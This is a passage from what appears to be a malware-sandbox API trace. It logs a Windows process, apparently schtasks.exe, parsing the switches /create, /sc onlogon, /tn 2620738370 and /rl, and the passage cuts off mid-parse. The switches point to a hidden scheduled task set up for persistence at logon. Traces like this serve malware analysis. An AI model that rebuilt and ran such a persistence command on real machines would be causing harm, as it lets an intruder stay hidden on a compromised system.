(Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.045] lstrlenW (lpString="tr") returned 2 [0074.045] GetThreadLocale () returned 0x409 [0074.045] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.045] lstrlenW (lpString="st") returned 2 [0074.045] GetThreadLocale () returned 0x409 [0074.045] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.045] lstrlenW (lpString="sd") returned 2 [0074.045] GetThreadLocale () returned 0x409 [0074.046] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.046] lstrlenW (lpString="ed") returned 2 [0074.046] GetThreadLocale () returned 0x409 [0074.046] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.046] lstrlenW (lpString="it") returned 2 [0074.046] GetThreadLocale () returned 0x409 [0074.046] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.046] lstrlenW (lpString="et") returned 2 [0074.046] GetThreadLocale () returned 0x409 [0074.046] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.046] lstrlenW (lpString="k") returned 1 [0074.046] GetThreadLocale () returned 0x409 [0074.046] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.046] lstrlenW (lpString="du") returned 2 [0074.046] GetThreadLocale () returned 0x409 [0074.046] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.046] lstrlenW (lpString="ri") returned 2 [0074.046] GetThreadLocale () returned 0x409 [0074.046] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.046] lstrlenW (lpString="z") returned 1 [0074.046] GetThreadLocale () returned 0x409 [0074.046] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.046] lstrlenW (lpString="f") returned 1 [0074.046] GetThreadLocale () returned 0x409 [0074.046] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.046] lstrlenW (lpString="v1") returned 2 [0074.046] GetThreadLocale () returned 0x409 [0074.046] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.046] lstrlenW (lpString="xml") returned 3 [0074.046] GetThreadLocale () returned 0x409 [0074.046] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.046] lstrlenW (lpString="ec") returned 2 [0074.046] GetThreadLocale () returned 0x409 [0074.046] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.046] lstrlenW (lpString="rl") returned 2 [0074.046] GetThreadLocale () returned 0x409 [0074.046] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.046] lstrlenW (lpString="delay") returned 5 [0074.047] GetThreadLocale () returned 0x409 [0074.047] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.047] lstrlenW (lpString="np") returned 2 [0074.047] SetLastError (dwErrCode=0x0) [0074.047] SetLastError (dwErrCode=0x0) [0074.047] lstrlenW (lpString="/create") returned 7 [0074.047] lstrlenW (lpString="-/") returned 2 [0074.047] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0074.047] lstrlenW (lpString="create") returned 6 [0074.047] lstrlenW (lpString="create") returned 6 [0074.047] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.047] lstrlenW (lpString="create") returned 6 [0074.047] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.047] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|create|") returned 8 [0074.047] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x9, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|create|") returned 8 [0074.047] lstrlenW (lpString="|create|") returned 8 [0074.047] lstrlenW (lpString="|create|") returned 8 [0074.047] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|" [0074.047] SetLastError (dwErrCode=0x0) [0074.047] SetLastError (dwErrCode=0x0) [0074.047] SetLastError (dwErrCode=0x0) [0074.047] lstrlenW (lpString="/sc") returned 3 [0074.047] lstrlenW (lpString="-/") returned 2 [0074.047] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0074.047] lstrlenW (lpString="create") returned 6 [0074.047] lstrlenW (lpString="create") returned 6 [0074.047] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.047] lstrlenW (lpString="sc") returned 2 [0074.047] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.047] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|create|") returned 8 [0074.047] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|sc|") returned 4 [0074.047] lstrlenW (lpString="|create|") returned 8 [0074.047] lstrlenW (lpString="|sc|") returned 4 [0074.047] StrStrIW (lpFirst="|create|", lpSrch="|sc|") returned 0x0 [0074.047] SetLastError (dwErrCode=0x490) [0074.047] lstrlenW (lpString="?") returned 1 [0074.048] lstrlenW (lpString="?") returned 1 [0074.048] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.048] lstrlenW (lpString="sc") returned 2 [0074.048] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.048] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|?|") returned 3 [0074.048] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|sc|") returned 4 [0074.048] lstrlenW (lpString="|?|") returned 3 [0074.048] lstrlenW (lpString="|sc|") returned 4 [0074.048] SetLastError (dwErrCode=0x490) [0074.048] lstrlenW (lpString="s") returned 1 [0074.048] lstrlenW (lpString="s") returned 1 [0074.048] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.048] lstrlenW (lpString="sc") returned 2 [0074.048] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.048] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|s|") returned 3 [0074.048] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|sc|") returned 4 [0074.048] lstrlenW (lpString="|s|") returned 3 [0074.048] lstrlenW (lpString="|sc|") returned 4 [0074.048] SetLastError (dwErrCode=0x490) [0074.048] lstrlenW (lpString="u") returned 1 [0074.048] lstrlenW (lpString="u") returned 1 [0074.048] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.048] lstrlenW (lpString="sc") returned 2 [0074.048] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.048] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|u|") returned 3 [0074.048] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|sc|") returned 4 [0074.048] lstrlenW (lpString="|u|") returned 3 [0074.048] lstrlenW (lpString="|sc|") returned 4 [0074.048] SetLastError (dwErrCode=0x490) [0074.048] lstrlenW (lpString="p") returned 1 [0074.048] lstrlenW (lpString="p") returned 1 [0074.048] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.048] lstrlenW (lpString="sc") returned 2 [0074.048] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.049] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|p|") returned 3 [0074.049] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|sc|") returned 4 [0074.049] lstrlenW (lpString="|p|") returned 3 [0074.049] lstrlenW (lpString="|sc|") returned 4 [0074.049] SetLastError (dwErrCode=0x490) [0074.049] lstrlenW (lpString="ru") returned 2 [0074.049] lstrlenW (lpString="ru") returned 2 [0074.049] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.049] lstrlenW (lpString="sc") returned 2 [0074.049] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.049] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|ru|") returned 4 [0074.049] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|sc|") returned 4 [0074.049] lstrlenW (lpString="|ru|") returned 4 [0074.049] lstrlenW (lpString="|sc|") returned 4 [0074.049] StrStrIW (lpFirst="|ru|", lpSrch="|sc|") returned 0x0 [0074.049] SetLastError (dwErrCode=0x490) [0074.049] lstrlenW (lpString="rp") returned 2 [0074.049] lstrlenW (lpString="rp") returned 2 [0074.049] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.049] lstrlenW (lpString="sc") returned 2 [0074.049] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.049] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rp|") returned 4 [0074.049] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|sc|") returned 4 [0074.049] lstrlenW (lpString="|rp|") returned 4 [0074.049] lstrlenW (lpString="|sc|") returned 4 [0074.049] StrStrIW (lpFirst="|rp|", lpSrch="|sc|") returned 0x0 [0074.049] SetLastError (dwErrCode=0x490) [0074.049] lstrlenW (lpString="sc") returned 2 [0074.049] lstrlenW (lpString="sc") returned 2 [0074.049] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.049] lstrlenW (lpString="sc") returned 2 [0074.049] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.049] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|sc|") returned 4 [0074.049] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|sc|") returned 4 [0074.050] lstrlenW (lpString="|sc|") returned 4 [0074.050] lstrlenW (lpString="|sc|") returned 4 [0074.050] StrStrIW (lpFirst="|sc|", lpSrch="|sc|") returned="|sc|" [0074.050] SetLastError (dwErrCode=0x0) [0074.050] SetLastError (dwErrCode=0x0) [0074.050] lstrlenW (lpString="onlogon") returned 7 [0074.050] lstrlenW (lpString="-/") returned 2 [0074.050] StrChrIW (lpStart="-/", wMatch=0x6f) returned 0x0 [0074.050] SetLastError (dwErrCode=0x490) [0074.050] SetLastError (dwErrCode=0x490) [0074.050] SetLastError (dwErrCode=0x0) [0074.050] lstrlenW (lpString="onlogon") returned 7 [0074.050] StrChrIW (lpStart="onlogon", wMatch=0x3a) returned 0x0 [0074.050] SetLastError (dwErrCode=0x490) [0074.050] SetLastError (dwErrCode=0x0) [0074.050] GetProcessHeap () returned 0x2c0000 [0074.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x10) returned 0x2d4d98 [0074.050] _memicmp (_Buf1=0x2d4d98, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.050] lstrlenW (lpString="onlogon") returned 7 [0074.050] GetProcessHeap () returned 0x2c0000 [0074.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x10) returned 0x2d4d68 [0074.050] lstrlenW (lpString="onlogon") returned 7 [0074.050] lstrlenW (lpString=" \x09") returned 2 [0074.050] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0074.050] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0074.050] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0074.050] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0074.050] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0074.050] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0074.050] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0074.050] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0074.050] GetLastError () returned 0x0 [0074.050] lstrlenW (lpString="onlogon") returned 7 [0074.050] lstrlenW (lpString="onlogon") returned 7 [0074.050] SetLastError (dwErrCode=0x0) [0074.050] SetLastError (dwErrCode=0x0) [0074.050] lstrlenW (lpString="/tn") returned 3 [0074.050] lstrlenW (lpString="-/") returned 2 [0074.051] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0074.051] lstrlenW (lpString="create") returned 6 [0074.051] lstrlenW (lpString="create") returned 6 [0074.051] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.051] lstrlenW (lpString="tn") returned 2 [0074.051] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.051] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|create|") returned 8 [0074.051] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tn|") returned 4 [0074.051] lstrlenW (lpString="|create|") returned 8 [0074.051] lstrlenW (lpString="|tn|") returned 4 [0074.051] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0 [0074.051] SetLastError (dwErrCode=0x490) [0074.051] lstrlenW (lpString="?") returned 1 [0074.051] lstrlenW (lpString="?") returned 1 [0074.051] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.051] lstrlenW (lpString="tn") returned 2 [0074.051] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.051] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|?|") returned 3 [0074.051] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tn|") returned 4 [0074.051] lstrlenW (lpString="|?|") returned 3 [0074.051] lstrlenW (lpString="|tn|") returned 4 [0074.051] SetLastError (dwErrCode=0x490) [0074.051] lstrlenW (lpString="s") returned 1 [0074.051] lstrlenW (lpString="s") returned 1 [0074.051] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.051] lstrlenW (lpString="tn") returned 2 [0074.051] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.051] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|s|") returned 3 [0074.051] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tn|") returned 4 [0074.051] lstrlenW (lpString="|s|") returned 3 [0074.051] lstrlenW (lpString="|tn|") returned 4 [0074.051] SetLastError (dwErrCode=0x490) [0074.051] lstrlenW (lpString="u") returned 1 [0074.052] lstrlenW (lpString="u") returned 1 [0074.052] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.052] lstrlenW (lpString="tn") returned 2 [0074.052] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.052] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|u|") returned 3 [0074.052] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tn|") returned 4 [0074.052] lstrlenW (lpString="|u|") returned 3 [0074.052] lstrlenW (lpString="|tn|") returned 4 [0074.052] SetLastError (dwErrCode=0x490) [0074.052] lstrlenW (lpString="p") returned 1 [0074.052] lstrlenW (lpString="p") returned 1 [0074.052] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.052] lstrlenW (lpString="tn") returned 2 [0074.052] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.052] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|p|") returned 3 [0074.052] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tn|") returned 4 [0074.052] lstrlenW (lpString="|p|") returned 3 [0074.052] lstrlenW (lpString="|tn|") returned 4 [0074.052] SetLastError (dwErrCode=0x490) [0074.052] lstrlenW (lpString="ru") returned 2 [0074.052] lstrlenW (lpString="ru") returned 2 [0074.052] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.052] lstrlenW (lpString="tn") returned 2 [0074.052] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.052] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|ru|") returned 4 [0074.052] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tn|") returned 4 [0074.052] lstrlenW (lpString="|ru|") returned 4 [0074.052] lstrlenW (lpString="|tn|") returned 4 [0074.052] StrStrIW (lpFirst="|ru|", lpSrch="|tn|") returned 0x0 [0074.052] SetLastError (dwErrCode=0x490) [0074.052] lstrlenW (lpString="rp") returned 2 [0074.052] lstrlenW (lpString="rp") returned 2 [0074.052] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.053] lstrlenW (lpString="tn") returned 2 [0074.053] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.053] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rp|") returned 4 [0074.053] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tn|") returned 4 [0074.053] lstrlenW (lpString="|rp|") returned 4 [0074.053] lstrlenW (lpString="|tn|") returned 4 [0074.053] StrStrIW (lpFirst="|rp|", lpSrch="|tn|") returned 0x0 [0074.053] SetLastError (dwErrCode=0x490) [0074.053] lstrlenW (lpString="sc") returned 2 [0074.053] lstrlenW (lpString="sc") returned 2 [0074.053] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.053] lstrlenW (lpString="tn") returned 2 [0074.053] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.053] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|sc|") returned 4 [0074.053] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tn|") returned 4 [0074.053] lstrlenW (lpString="|sc|") returned 4 [0074.053] lstrlenW (lpString="|tn|") returned 4 [0074.053] StrStrIW (lpFirst="|sc|", lpSrch="|tn|") returned 0x0 [0074.053] SetLastError (dwErrCode=0x490) [0074.053] lstrlenW (lpString="mo") returned 2 [0074.053] lstrlenW (lpString="mo") returned 2 [0074.053] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.053] lstrlenW (lpString="tn") returned 2 [0074.053] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.053] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|mo|") returned 4 [0074.053] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tn|") returned 4 [0074.053] lstrlenW (lpString="|mo|") returned 4 [0074.053] lstrlenW (lpString="|tn|") returned 4 [0074.053] StrStrIW (lpFirst="|mo|", lpSrch="|tn|") returned 0x0 [0074.053] SetLastError (dwErrCode=0x490) [0074.053] lstrlenW (lpString="d") returned 1 [0074.053] lstrlenW (lpString="d") returned 1 [0074.053] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.054] lstrlenW (lpString="tn") returned 2 [0074.054] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.054] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|d|") returned 3 [0074.054] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tn|") returned 4 [0074.054] lstrlenW (lpString="|d|") returned 3 [0074.054] lstrlenW (lpString="|tn|") returned 4 [0074.054] SetLastError (dwErrCode=0x490) [0074.054] lstrlenW (lpString="m") returned 1 [0074.054] lstrlenW (lpString="m") returned 1 [0074.054] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.054] lstrlenW (lpString="tn") returned 2 [0074.054] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.054] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|m|") returned 3 [0074.054] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tn|") returned 4 [0074.054] lstrlenW (lpString="|m|") returned 3 [0074.054] lstrlenW (lpString="|tn|") returned 4 [0074.054] SetLastError (dwErrCode=0x490) [0074.054] lstrlenW (lpString="i") returned 1 [0074.054] lstrlenW (lpString="i") returned 1 [0074.054] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.054] lstrlenW (lpString="tn") returned 2 [0074.054] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.054] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|i|") returned 3 [0074.054] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tn|") returned 4 [0074.054] lstrlenW (lpString="|i|") returned 3 [0074.054] lstrlenW (lpString="|tn|") returned 4 [0074.054] SetLastError (dwErrCode=0x490) [0074.054] lstrlenW (lpString="tn") returned 2 [0074.054] lstrlenW (lpString="tn") returned 2 [0074.054] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.054] lstrlenW (lpString="tn") returned 2 [0074.054] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.054] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tn|") returned 4 [0074.055] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tn|") returned 4 [0074.055] lstrlenW (lpString="|tn|") returned 4 [0074.055] lstrlenW (lpString="|tn|") returned 4 [0074.055] StrStrIW (lpFirst="|tn|", lpSrch="|tn|") returned="|tn|" [0074.055] SetLastError (dwErrCode=0x0) [0074.055] SetLastError (dwErrCode=0x0) [0074.055] lstrlenW (lpString="2620738370") returned 10 [0074.055] lstrlenW (lpString="-/") returned 2 [0074.055] StrChrIW (lpStart="-/", wMatch=0x32) returned 0x0 [0074.055] SetLastError (dwErrCode=0x490) [0074.055] SetLastError (dwErrCode=0x490) [0074.055] SetLastError (dwErrCode=0x0) [0074.055] lstrlenW (lpString="2620738370") returned 10 [0074.055] StrChrIW (lpStart="2620738370", wMatch=0x3a) returned 0x0 [0074.055] SetLastError (dwErrCode=0x490) [0074.055] SetLastError (dwErrCode=0x0) [0074.055] lstrlenW (lpString="2620738370") returned 10 [0074.055] SetLastError (dwErrCode=0x0) [0074.055] SetLastError (dwErrCode=0x0) [0074.055] lstrlenW (lpString="/rl") returned 3 [0074.055] lstrlenW (lpString="-/") returned 2 [0074.055] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0074.055] lstrlenW (lpString="create") returned 6 [0074.055] lstrlenW (lpString="create") returned 6 [0074.055] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.055] lstrlenW (lpString="rl") returned 2 [0074.055] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.055] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|create|") returned 8 [0074.055] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.055] lstrlenW (lpString="|create|") returned 8 [0074.055] lstrlenW (lpString="|rl|") returned 4 [0074.055] StrStrIW (lpFirst="|create|", lpSrch="|rl|") returned 0x0 [0074.055] SetLastError (dwErrCode=0x490) [0074.055] lstrlenW (lpString="?") returned 1 [0074.055] lstrlenW (lpString="?") returned 1 [0074.055] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.055] lstrlenW (lpString="rl") returned 2 [0074.055] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.056] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|?|") returned 3 [0074.056] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.056] lstrlenW (lpString="|?|") returned 3 [0074.056] lstrlenW (lpString="|rl|") returned 4 [0074.056] SetLastError (dwErrCode=0x490) [0074.056] lstrlenW (lpString="s") returned 1 [0074.056] lstrlenW (lpString="s") returned 1 [0074.056] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.056] lstrlenW (lpString="rl") returned 2 [0074.056] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.056] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|s|") returned 3 [0074.056] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.056] lstrlenW (lpString="|s|") returned 3 [0074.056] lstrlenW (lpString="|rl|") returned 4 [0074.056] SetLastError (dwErrCode=0x490) [0074.056] lstrlenW (lpString="u") returned 1 [0074.056] lstrlenW (lpString="u") returned 1 [0074.056] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.056] lstrlenW (lpString="rl") returned 2 [0074.056] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, 